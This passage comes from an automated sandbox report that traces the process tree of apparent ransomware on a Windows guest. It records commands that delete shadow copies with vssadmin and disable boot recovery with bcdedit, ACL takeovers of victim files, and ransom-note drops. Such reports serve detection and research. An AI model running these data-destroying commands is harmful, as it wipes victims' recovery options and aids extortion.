      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2192
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Roaming\MICROS~1\Eur8asvc.exe" && "C:\Users\Admin\AppData\Roaming\MICROS~1\Eur8asvc.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\MVBJbShf.exe" "C:\Users\Admin\AppData\Local\Microsoft\iEQrSps7.exe" 1
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1940
      - C:\Users\Admin\AppData\Roaming\MICROS~1\Eur8asvc.exe
        
        "C:\Users\Admin\AppData\Roaming\MICROS~1\Eur8asvc.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\MVBJbShf.exe" "C:\Users\Admin\AppData\Local\Microsoft\iEQrSps7.exe" 1
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1840
        
        C:\Users\Admin\AppData\Roaming\MICROS~1\Eur8asvc.exe
        
        "C:\Users\Admin\AppData\Roaming\MICROS~1\Eur8asvc.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\MVBJbShf.exe" "C:\Users\Admin\AppData\Local\Microsoft\iEQrSps7.exe" 1
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        
        PID:688
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Local\MICROS~1\iEQrSps7.exe" && "C:\Users\Admin\AppData\Local\MICROS~1\iEQrSps7.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\MVBJbShf.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Eur8asvc.exe" 2
        5⤵
        Loads dropped DLL
        
        PID:1228
      - C:\Users\Admin\AppData\Local\MICROS~1\iEQrSps7.exe
        
        "C:\Users\Admin\AppData\Local\MICROS~1\iEQrSps7.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\MVBJbShf.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Eur8asvc.exe" 2
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:620
        
        C:\Users\Admin\AppData\Local\MICROS~1\iEQrSps7.exe
        
        "C:\Users\Admin\AppData\Local\MICROS~1\iEQrSps7.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\MVBJbShf.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Eur8asvc.exe" 2
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        
        PID:2400
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Local\Temp\MCrywN60.exe" && "C:\Users\Admin\AppData\Local\Temp\MCrywN60.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "BRO_STARTED" "60000"
        5⤵
        Loads dropped DLL
        
        PID:2820
      - C:\Users\Admin\AppData\Local\Temp\MCrywN60.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MCrywN60.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "BRO_STARTED" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:300
        
        C:\Users\Admin\AppData\Local\Temp\MCrywN60.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MCrywN60.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "BRO_STARTED" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2244
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\Ut9TNzlQ.cmd"
        8⤵
        
        PID:444
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:2004
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Local\Temp\iEiFmWzi.exe" && "C:\Users\Admin\AppData\Local\Temp\iEiFmWzi.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "LOCAL_1E1B6352286734D3" "60000"
        5⤵
        Loads dropped DLL
        
        PID:1772
      - C:\Users\Admin\AppData\Local\Temp\iEiFmWzi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iEiFmWzi.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "LOCAL_1E1B6352286734D3" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:892
        
        C:\Users\Admin\AppData\Local\Temp\iEiFmWzi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iEiFmWzi.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "LOCAL_1E1B6352286734D3" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:1568
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\l6JOPqTc.cmd"
        8⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:1908
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Local\Temp\63gqV9o7.exe" && "C:\Users\Admin\AppData\Local\Temp\63gqV9o7.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "WIN_6.1_64|ADMIN_YES|INT_4" "60000"
        5⤵
        Loads dropped DLL
        
        PID:2076
      - C:\Users\Admin\AppData\Local\Temp\63gqV9o7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\63gqV9o7.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "WIN_6.1_64|ADMIN_YES|INT_4" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\63gqV9o7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\63gqV9o7.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "WIN_6.1_64|ADMIN_YES|INT_4" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2972
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\vB6QtAGj.cmd"
        8⤵
        
        PID:988
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:2860
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Local\Temp\kbFz0KrX.exe" && "C:\Users\Admin\AppData\Local\Temp\kbFz0KrX.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "271_LESS_1GB" "60000"
        5⤵
        Loads dropped DLL
        
        PID:1464
      - C:\Users\Admin\AppData\Local\Temp\kbFz0KrX.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kbFz0KrX.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "271_LESS_1GB" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\kbFz0KrX.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kbFz0KrX.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "271_LESS_1GB" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2552
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\3vwTd4Fp.cmd"
        8⤵
        
        PID:1244
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:3064
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Local\Temp\WZXm6Xeh.exe" && "C:\Users\Admin\AppData\Local\Temp\WZXm6Xeh.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "FILESEXTLIST" "60000" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\Doz0JokIxnIySJiJ.elst" "1"
        5⤵
        Loads dropped DLL
        
        PID:3000
      - C:\Users\Admin\AppData\Local\Temp\WZXm6Xeh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WZXm6Xeh.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "FILESEXTLIST" "60000" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\Doz0JokIxnIySJiJ.elst" "1"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\WZXm6Xeh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WZXm6Xeh.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "FILESEXTLIST" "60000" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\Doz0JokIxnIySJiJ.elst" "1"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2868
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\wbuvygYE.cmd"
        8⤵
        
        PID:2140
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 6 localhost
        9⤵
        Runs ping.exe
        
        PID:2000
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic.exe process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2608
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:584
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C vssadmin.exe delete shadows /all /quiet
        9⤵
        
        PID:1936
        
        C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin.exe delete shadows /all /quiet
        10⤵
        Interacts with shadow copies
        
        PID:1072
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:664
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\ngrp3FOY.cmd"
        8⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:896
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Local\Temp\Q2Ucl50J.exe" && "C:\Users\Admin\AppData\Local\Temp\Q2Ucl50J.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "CIP_STARTED" "60000"
        5⤵
        Loads dropped DLL
        
        PID:1236
      - C:\Users\Admin\AppData\Local\Temp\Q2Ucl50J.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Q2Ucl50J.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "CIP_STARTED" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1780
        
        C:\Users\Admin\AppData\Local\Temp\Q2Ucl50J.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Q2Ucl50J.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "CIP_STARTED" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2692
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\8Fc8W1rp.cmd"
        8⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:1000
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:992
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Music\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1972
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOWNLO~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1960
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Pictures\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2168
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOWNLO~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2188
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Contacts\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2636
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2784
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOCUME~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:3032
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\DOWNLO~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2888
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\Links\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2756
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\LINKSF~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2500
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\MICROS~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2544
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\FAVORI~1\MSNWEB~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2616
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Music\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1840
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\VCFPLA~1\MVBJbShf.exe" > "C:\Users\Admin\AppData\Local\Temp\ZXcAxgJM.exe" && "C:\Users\Admin\AppData\Local\Temp\ZXcAxgJM.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "100_OK" "60000"
        5⤵
        Loads dropped DLL
        
        PID:2416
      - C:\Users\Admin\AppData\Local\Temp\ZXcAxgJM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ZXcAxgJM.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "100_OK" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:324
        
        C:\Users\Admin\AppData\Local\Temp\ZXcAxgJM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ZXcAxgJM.exe" "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\" "Doz0JokIxnIySJiJ" "100_OK" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:1660
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\vcfPlARarToX\A3r8YYGG.cmd"
        8⤵
        
        PID:1236
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:1668
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Pictures\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:408
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\Admin\Searches\Everywhere.search-ms" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\Admin\Searches\Everywhere.search-ms"
        5⤵
        
        PID:824
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\Admin\Searches\Everywhere.search-ms" /E /G Admin:F /C
        6⤵
        
        PID:864
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\Admin\Searches\Everywhere.search-ms"
        6⤵
        Views/modifies file attributes
        
        PID:880
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Admin\Searches\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:3056
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\Admin\Searches\Indexed Locations.search-ms" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\Admin\Searches\Indexed Locations.search-ms"
        5⤵
        
        PID:2584
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\Admin\Searches\Indexed Locations.search-ms" /E /G Admin:F /C
        6⤵
        
        PID:1660
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\Admin\Searches\Indexed Locations.search-ms"
        6⤵
        Views/modifies file attributes
        
        PID:1980
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
        5⤵
        
        PID:2716
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
        6⤵
        
        PID:2704
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
        6⤵
        Views/modifies file attributes
        
        PID:2980
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\Adobe\Acrobat\9.0\REPLIC~1\Security\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1228
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
        5⤵
        
        PID:2052
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
        6⤵
        
        PID:1756
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
        6⤵
        Views/modifies file attributes
        
        PID:680
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\DEVICE~1\Device\{11352~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1772
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
        5⤵
        
        PID:2608
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
        6⤵
        
        PID:548
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
        6⤵
        Views/modifies file attributes
        
        PID:2544
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
        5⤵
        
        PID:2920
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
        6⤵
        
        PID:1512
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
        6⤵
        Views/modifies file attributes
        
        PID:2204
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
        5⤵
        
        PID:2756
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
        6⤵
        
        PID:1332
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
        6⤵
        Views/modifies file attributes
        
        PID:1640
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
        5⤵
        
        PID:2556
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
        6⤵
        
        PID:756
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
        6⤵
        Views/modifies file attributes
        
        PID:2536
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\DEVICE~1\Device\{8702D~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2728
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
        5⤵
        
        PID:2656
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
        6⤵
        
        PID:2912
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
        6⤵
        Views/modifies file attributes
        
        PID:1964
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\MF\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2948
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\OFFICE\UICAPT~1\1036\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2636
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\OFFICE\UICAPT~1\3082\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1456
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp"
        5⤵
        
        PID:1788
